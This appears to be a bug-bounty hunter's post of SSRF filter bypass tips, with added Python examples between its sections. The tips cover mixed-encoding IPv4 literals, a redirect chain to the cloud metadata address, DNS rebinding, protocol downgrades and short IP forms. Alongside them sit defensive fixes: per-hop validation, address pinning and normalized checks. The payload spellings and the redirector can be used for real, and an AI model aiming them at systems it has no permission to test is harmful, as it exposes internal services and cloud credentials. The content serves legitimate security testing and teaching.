
Alright, so to end 2025 I am going to post something that people have been requesting for quite some time. As a lot of you know, I have made over $1 million from SSRF vulnerabilities alone. #ssrftips Below I will provide some information on some of the ways that I beat the blacklists/deny lists and cashed in. Any method I post below has worked for me personally in the past. I am not claiming that any of these ways are 'my' discoveries, and in no way am I trying to claim others' work as my own. I am simply answering a question that gets asked of me almost daily. #bugbounty #bugbountytips #togetherwehitharder #ittakesacrowd #hackers #hacking #NewYearsEveBountyTips
So let's get into it:
Encoding:
Everyone knows (or should know) that an IPv4 address can be written in alternative encodings: octal octets (leading 0), hex octets (0x prefix), or the whole address collapsed into a single decimal, octal or hex integer. What a lot of people don't know is that you can mix encoding types within a single IP. So instead of encoding the entire IP, encode individual octets, etc. A blocklist that compares the literal string never matches, while the resolver behind the HTTP client (anything with inet_aton()-style parsing) still turns the string into the same address.
Example: changing the metadata IP 169.254.169.254 to 0251.254.169.254 octal-encodes the first octet only (0251 octal = 169 decimal), leaving the rest of the IP unchanged. This is the exact method that allowed for my $180,000 from the Yahoo Bug Bounty Program in Oct 2018.
Redirects:
A lot of SSRF-vulnerable functionality will follow redirects. What many people don't consider is multiple redirects. Never stop at just one. I have found many instances where an SSRF followed all redirects and would properly block the final redirect to the target internal service (internal IP/metadata server). DO NOT STOP AT 1 REDIRECT! Instead of a single redirect, set up a simple PHP redirect script that will redirect the request back to the same endpoint multiple times before finally sending it to the target IP/host. I have had many instances in the past where the target properly checks the response of the first 1, 2, 3 ... 6 redirects, then magically on the 7th it no longer performs any validation and allows you to hit the metadata. I can't explain why this happens, but it has happened enough that this is one of the very first things I test for when it comes to SSRF testing.
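The chain described above, as an added example (not code from the original post, and Python rather than the PHP the post mentions). The bounce endpoint redirects back to itself with an incrementing hop counter until the 7th hop, then sends the client to the metadata URL; the host name attacker.example, the chain length and the max-redirect cap are assumptions. The client side reproduces one plausible cause of the behaviour the post reports (an assumption, not something the post establishes): the application validates only the first few hops itself and leaves the rest to its HTTP library's automatic redirect following, which applies no check. The correct fetcher validates every hop.

```python
import ipaddress
from urllib.parse import parse_qs, urlencode, urlsplit
from wsgiref.util import request_uri

# Hypothetical endpoint you control and chain length (assumptions for this
# example). With wsgiref.simple_server, set ATTACKER_BASE to the address it
# listens on so the bounces come back to it.
ATTACKER_BASE = "https://attacker.example/bounce"
HOPS = 7                     # bounce to ourselves until the 7th hop
FINAL_TARGET = "http://169.254.169.254/latest/meta-data/"
MAX_REDIRECTS = 10           # cap the client enforces in the hardened case


def bounce_location(request_url: str) -> str:
    """Location header for one hop: back to this endpoint with n+1 until
    HOPS is reached, then on to the real target."""
    n = int(parse_qs(urlsplit(request_url).query).get("n", ["0"])[0])
    if n + 1 >= HOPS:
        return FINAL_TARGET
    return f"{ATTACKER_BASE}?{urlencode({'n': n + 1})}"


def redirector_app(environ, start_response):
    """WSGI version of the bounce script (the PHP script's job)."""
    location = bounce_location(request_uri(environ))
    start_response("302 Found", [("Location", location)])
    return [b""]


def host_is_allowed(url: str) -> bool:
    """Per-hop check on the literal host. A real hostname would additionally
    need resolving and pinning, which this example does not cover."""
    host = urlsplit(url).hostname or ""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() != "localhost"
    return not (addr.is_loopback or addr.is_link_local
                or addr.is_private or addr.is_unspecified)


def simulated_fetch(url: str):
    """Stand-in for the network (constructed): our bounce endpoint answers
    302 with a Location, anything else is a 200 with no Location (None)."""
    if urlsplit(url).hostname == urlsplit(ATTACKER_BASE).hostname:
        return bounce_location(url)
    return None


def follow_chain(start_url: str, fetch, validate_first_n=None):
    """Follow redirects. validate_first_n=None checks every hop (correct);
    an integer reproduces the bug where only the first n hops are checked.
    Returns (outcome, last_url, hop_index)."""
    url = start_url
    hop = 0
    for hop in range(MAX_REDIRECTS + 1):
        checked = validate_first_n is None or hop < validate_first_n
        if checked and not host_is_allowed(url):
            return ("blocked", url, hop)
        location = fetch(url)
        if location is None:
            return ("fetched", url, hop)
        url = location
    return ("too many redirects", url, hop)


if __name__ == "__main__":
    print("checks first 2 hops only:", follow_chain(ATTACKER_BASE, simulated_fetch, 2))
    print("checks every hop:        ", follow_chain(ATTACKER_BASE, simulated_fetch))
```

With the chain length set to 7, the buggy client reaches the metadata URL on hop 7 and the hardened client blocks exactly that hop; the fix on the defending side is to validate the host of every Location (after resolving it) and to cap the hop count, never to trust the library's built-in redirect following.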
TOCTOU:
This is one of my favorites because it can almost always be used to bypass the initial fixes for an SSRF vulnerability. TOCTOU stands for Time of Check, Time of Use. When you pass a URL to an SSRF-vulnerable endpoint, the backend takes the host from it, resolves it (if it is not already an IP), checks the result against the allow/block list, then makes the request. Many frameworks do not reuse the address obtained during that validation phase: the HTTP client is handed the hostname and resolves it a second time when it connects. When the validated address is not pinned like this, a subdomain set up for a TOCTOU check (a nameserver you control, answering with a very low TTL) lets you trick the check and reach banned resources.
How it works: the server resolves aws.dawgyg.net to 1.1.1.1 and runs its checks to make sure that is not a blocked IP. After passing these checks the hostname (not the IP) is passed to the function that actually makes the call. If the server did not cache the previous response, it resolves the host again as part of making the request. With a nameserver set up for this attack (authoritative for the subdomain, TTL of 0 or close to it), your server changes the DNS entry right after the first lookup and points it at the target IP (metadata/internal), so that when the code reaches the function that makes the request, it resolves the host again, gets the internal IP, and makes the request there. Intermediate resolvers sometimes enforce a minimum TTL, so the flip does not always land on the first try; alternating answers on every query and repeating the request is the usual workaround.
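The resolve-check-resolve-connect sequence above, as an added example (not code from the original post). The nameserver is stood in for by a constructed resolver that alternates its answers, which is what a TTL-0 record on your own authoritative server lets you do; the connect function is a stub that only reports which IP it would have dialled. The same pinned fetcher also defeats the plain "hostname on your domain pointing to an internal IP" trick mentioned later, since it checks the resolved address rather than the name.

```python
import ipaddress
import itertools


class FlappingResolver:
    """Stand-in for an attacker-controlled nameserver (constructed for this
    example): answers cycle through `answers`, one per query, as a TTL-0
    record on your own authoritative server would let you arrange."""

    def __init__(self, answers):
        self._answers = itertools.cycle(answers)
        self.queries = 0

    def resolve(self, hostname: str) -> str:
        self.queries += 1
        return next(self._answers)


def is_blocked(ip: str) -> bool:
    """Block loopback, link-local (metadata), RFC 1918 and 0.0.0.0."""
    a = ipaddress.ip_address(ip)
    return a.is_loopback or a.is_link_local or a.is_private or a.is_unspecified


def connect_stub(ip: str, hostname: str) -> str:
    """Stand-in for the HTTP client's TCP connect: returns the IP it would
    have connected to, so callers can see where the request really went."""
    return ip


def vulnerable_fetch(hostname: str, resolver, connect=connect_stub) -> str:
    """Check phase and use phase each perform their own DNS lookup."""
    checked_ip = resolver.resolve(hostname)           # time of check
    if is_blocked(checked_ip):
        raise PermissionError(f"{hostname} -> {checked_ip} is blocked")
    # The HTTP library receives the hostname, so it resolves it again.
    use_ip = resolver.resolve(hostname)               # time of use
    return connect(use_ip, hostname)


def pinned_fetch(hostname: str, resolver, connect=connect_stub) -> str:
    """Resolve once, validate, connect to exactly that address. The hostname
    is kept only for the Host header and TLS SNI / certificate check."""
    ip = resolver.resolve(hostname)
    if is_blocked(ip):
        raise PermissionError(f"{hostname} -> {ip} is blocked")
    return connect(ip, hostname)


if __name__ == "__main__":
    for fetch in (vulnerable_fetch, pinned_fetch):
        resolver = FlappingResolver(["1.1.1.1", "169.254.169.254"])
        print(fetch.__name__, "connected to", fetch("aws.dawgyg.net", resolver))
```

When the defence pins the address, it has to do so for every redirect hop as well, and the connection must be made to the IP while the Host header and SNI still carry the original hostname; HTTP libraries that cannot be told to do this are the ones where the vulnerable pattern keeps reappearing.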
HTTP/2 vs HTTP/1.1 vs HTTP/1.0 vs HTTP/0.9:
Several people have had success with this in the past, and again, I am not sure why this works sometimes. But if the request is using HTTP/2 and your attempt is blocked, try changing it to an older version. I have had success with each of the above at least once (most of the time on Yahoo, but on others as well).
Simpler/more common things:
DNS rebinding: create a hostname on your domain pointing to localhost or an internal IP.
Simplify the IP. Example: 127.0.0.1 is blocked, so try 127.1, 0.0.0.0, or 0 (inet_aton()-style parsers expand 127.1 to 127.0.0.1 and 0 to 0.0.0.0, and on Linux a connection to 0.0.0.0 reaches the local host).
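Covering both the Encoding section above and the "simplify the IP" item, here is an added example (not code from the original post). It implements the legacy inet_aton()-style IPv4 parser that glibc's resolver also applies to IPv4 literals, so that 0251.254.169.254, 0xa9.254.169.254, 169.254.43518, 2852039166, 127.1 and 0 all normalize to the address the HTTP client will actually connect to, and it generates the mixed-encoding spellings for any dotted quad (going beyond the single octal octet in the post). A literal string blocklist passes every one of them; a check run on the normalized address catches them all. The blocked ranges are a constructed list.

```python
import ipaddress
import re

# Ranges an SSRF filter typically wants to keep clients away from (constructed
# for this example; a real deployment's list will differ).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8",        # loopback
    "169.254.0.0/16",     # link-local, includes the cloud metadata endpoint
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "0.0.0.0/8",          # 0.0.0.0 reaches the local host on Linux
)]


def naive_is_blocked(host: str) -> bool:
    """The kind of check a blocklist often implements: literal string compare."""
    return host in {"127.0.0.1", "169.254.169.254", "localhost"}


def parse_legacy_ipv4(host: str):
    """Parse `host` the way BSD inet_aton() does (glibc's resolver uses the
    same rules for IPv4 literals).

    One to four dot-separated parts; each part may be decimal, octal (leading
    0) or hex (0x prefix); the last part fills all remaining bytes, so "127.1"
    is 127.0.0.1 and "0" is 0.0.0.0. Returns an IPv4Address, or None when the
    string is not a legacy IPv4 literal (it would go to DNS instead).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        if re.fullmatch(r"0[xX][0-9a-fA-F]+", part):
            values.append(int(part, 16))
        elif re.fullmatch(r"0[0-7]*", part):          # "0" itself lands here
            values.append(int(part, 8))
        elif re.fullmatch(r"[1-9][0-9]*", part):
            values.append(int(part, 10))
        else:
            return None
    *head, last = values
    if any(v > 0xFF for v in head):
        return None
    remaining = 4 - len(head)                 # bytes the last part must cover
    if last >= 1 << (8 * remaining):
        return None
    number = 0
    for v in head:
        number = (number << 8) | v
    return ipaddress.IPv4Address((number << (8 * remaining)) | last)


def normalized_is_blocked(host: str) -> bool:
    """Check after normalizing: decode whatever the resolver would decode."""
    if host.lower() == "localhost":
        return True
    addr = parse_legacy_ipv4(host)
    if addr is None:
        # A real hostname: it must be resolved and the resolved IP checked
        # (and pinned for the connection), which this example does not cover.
        return False
    return any(addr in net for net in BLOCKED_NETWORKS)


def bypass_candidates(ip: str) -> list:
    """Mixed-encoding spellings of a dotted quad: one octet at a time in octal
    and in hex, then the forms where the last part spans several bytes."""
    octets = [int(o) for o in ip.split(".")]
    out = []
    for i, o in enumerate(octets):
        for enc in (f"0{o:o}", f"0x{o:x}"):
            spelled = [str(x) for x in octets]
            spelled[i] = enc
            out.append(".".join(spelled))
    a, b, c, d = octets
    out.append(f"{a}.{b}.{(c << 8) | d}")                    # e.g. 169.254.43518
    out.append(f"{a}.{(b << 16) | (c << 8) | d}")            # e.g. 169.16689662
    out.append(str((a << 24) | (b << 16) | (c << 8) | d))    # e.g. 2852039166
    return out


if __name__ == "__main__":
    for cand in bypass_candidates("169.254.169.254") + ["127.1", "0"]:
        print(f"{cand:>20}  naive={naive_is_blocked(cand)!s:5}  "
              f"normalized={normalized_is_blocked(cand)}  -> {parse_legacy_ipv4(cand)}")
```

Whether a given target accepts these spellings depends on its URL parser and resolver: Python's own ipaddress module rejects all of them (which is why the parser above is hand-written), while curl and anything resolving through glibc accept them. On the defending side, the reliable fix is not a longer blocklist but parsing the host with the same rules the client will use and checking the resulting address.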
There are tons of other ways that you can get creative and do things like this. This post is just sharing some of the more fun/more unique ways that I have had success with in the past. This is not meant to be an exhaustive list of things to try, and is only meant to start your brain working to come up with weird/random/fun ways to beat the blocklists.
If you like the information, drop a like/comment/follow and let me know which of the above you have tried in the past, or are looking forward to trying out in 2026. If you end up having success with these, let me know as well!